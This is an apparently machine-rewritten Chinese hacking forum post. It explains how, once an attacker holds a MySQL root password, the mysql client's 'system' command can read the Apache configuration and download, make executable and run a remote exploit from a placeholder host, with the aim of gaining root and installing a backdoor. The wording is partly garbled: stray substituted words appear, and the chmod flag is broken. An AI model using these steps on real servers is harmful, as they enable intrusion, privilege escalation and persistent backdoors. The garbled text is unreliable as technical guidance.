Author: Sh@dow
刚刚在卫生间蹲下的情况下突然想起这个问题,mysql5.x for linux下边有一个函数,能够协助大家干许多 事儿,这一函数4。x下边好像没,原先一直没发觉,也没去查函数指南,就自己的工作经验来写点东西。4,x的明日再看一下函数指南,再装一个试验一下。mysql 5.x里边引入了一个system函数,这一函数能够实行DOS命令,当mysql以root登录的情况下,就可以利用这一函数运行命令,自然是在管理权限批准的范畴内。
一般大家依照基本思路,搞到mysql的root登陆密码以后,大家都是会联接上来,建立一个表,随后outfile,搞到一个webshell ,随后提权从此之后。今日大家换一种方法
依照上边的方式,大家必须了解web的相对路径,自然这一很不太好找,一些有sqlinjection的,很有可能出错会显示信息出去,有的就不一定了。可是依照我的的方式,沒有必需再去找web途径了,立即实行
mysql>system vi /etc/httpd/conf/httpd.conf;
mysql>system vi /etc/httpd/conf/httpd.conf;
立即那样就可以寻找web的途径,自然,大家的目地并并不是找web途径,放webshell进来。我们都是要来做别的的事儿,例如,免费下载exp实行,搞到root管理权限,随后装侧门虾米音乐的
mysql>system wget http://xxxx.xxx.com/xxxx
mysql>system chmod x xxxx;
mysql>system ./xxxx;
mysql>system wget http://xxxx.xxx.com/xxxx mysql>system chmod x xxxx;mysql>system ./xxxx;
那样mysql的root这时就变成system的root了,剩余的事儿,倘若开过ssh,就ssh上来,键入mysql的客户登陆密码,ok,拿下。
或是,立即提权以后,免费下载侧门安裝,这一就交给大伙儿去科学研究了。